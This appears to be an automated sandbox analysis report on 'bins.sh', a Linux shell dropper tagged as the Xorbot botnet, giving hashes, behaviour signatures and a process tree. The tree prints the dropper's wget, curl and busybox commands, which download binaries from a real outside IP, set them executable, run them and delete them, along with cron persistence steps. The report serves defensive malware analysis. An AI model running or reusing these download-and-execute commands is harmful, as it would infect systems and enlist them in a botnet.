Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
12/12/2024, 10:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
77f2788932c4fa92f7da10e0cf30b710
-
SHA1
34231472e20b28c66b6cc03df92ba790c166f670
-
SHA256
1a625fb6cd939030ba385771e066dbca31337a58ed8eb46007780d1f21e8a52c
-
SHA512
660f2cc05d54b543ee7b78492f3949dbfc7421fc63eba4255fff73c14e8a9613f25387991e176f151722692fe24a8a53663ec9a29bdcac608850e629e7d217b6
-
SSDEEP
192:1Tph4B98IjHWfPEsPhNA8FlK9hGm2KZUpxiN1jHWfPLFhNA+FlK9hW2KZUpxfHp6:Rph4B98IjHWfPEspFlK9hGmdZUpxiN14
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot behavioral1/files/fstream-3.dat family_xorbot -
Xorbot family
-
Contacts a large (2219) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1524 chmod 1531 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB 1525 P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q 1532 I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q -
Renames itself 1 IoCs
pid Process 1533 I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q -
Unexpected DNS network traffic destination 29 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 Destination IP 1.0.0.0 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.n0JBQ1 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/1581/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1598/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1699/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1546/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1558/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/26/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/35/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/85/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/185/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/615/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/728/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/6/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/7/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1723/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1728/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1180/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1559/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1188/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1628/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1644/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1683/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1708/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1735/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/28/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/654/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1352/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1627/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1648/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1118/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1266/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/173/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1515/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1591/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1593/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1619/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1630/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/169/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/170/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1672/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1697/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1745/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1640/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1656/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1696/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1746/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/25/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/83/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1042/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1075/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1636/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1732/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/80/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/979/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/686/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1080/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1541/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1568/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1666/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1679/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/8/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/321/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1716/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1720/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q File opened for reading /proc/1635/cmdline I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB wget File opened for modification /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB curl File opened for modification /tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB busybox File opened for modification /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q wget File opened for modification /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q curl File opened for modification /tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1515
-
/bin/rm/bin/rm bins.sh2⤵PID:1516
-
-
/usr/bin/wgetwget http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵
- Writes file to tmp directory
PID:1517
-
-
/usr/bin/curlcurl -O http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://37.44.238.68/bins/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/chmodchmod 777 P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB./P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm P1s8vpCoB1mh8CMmocaguUUeZt53fULtSB2⤵PID:1527
-
-
/usr/bin/wgetwget http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵
- Writes file to tmp directory
PID:1528
-
-
/usr/bin/curlcurl -O http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://37.44.238.68/bins/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod 777 I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q./I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1532 -
/bin/shsh -c "crontab -l"3⤵PID:1534
-
/usr/bin/crontabcrontab -l4⤵PID:1535
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1536
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1537
-
-
-
-
/bin/rmrm I9pvk64al7KI3Uu97n2onzJLmOGvl5OI0Q2⤵PID:1539
-
-
/usr/bin/wgetwget http://37.44.238.68/bins/lIAQvJv5Nr8iNWgZLhVX3C8ge5evZPbSAY2⤵PID:1542
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
210B
MD50a72505ca22416d46223eb2ebaefa04f
SHA137486ec8d973f7de766bd523c55b6fb5187c8b99
SHA2565ff571930a88acc2c9d2e9ac9d30502fa5f61e0fce0135a868dc5bec5733230b
SHA512e5a8a0bb5215cb4cd819209c0ab93565783b50e5caf1bf176731db2d4acca6b3be59a729575b9d1badde7d5795ef2071d13597ae9753890fc577015a5662202f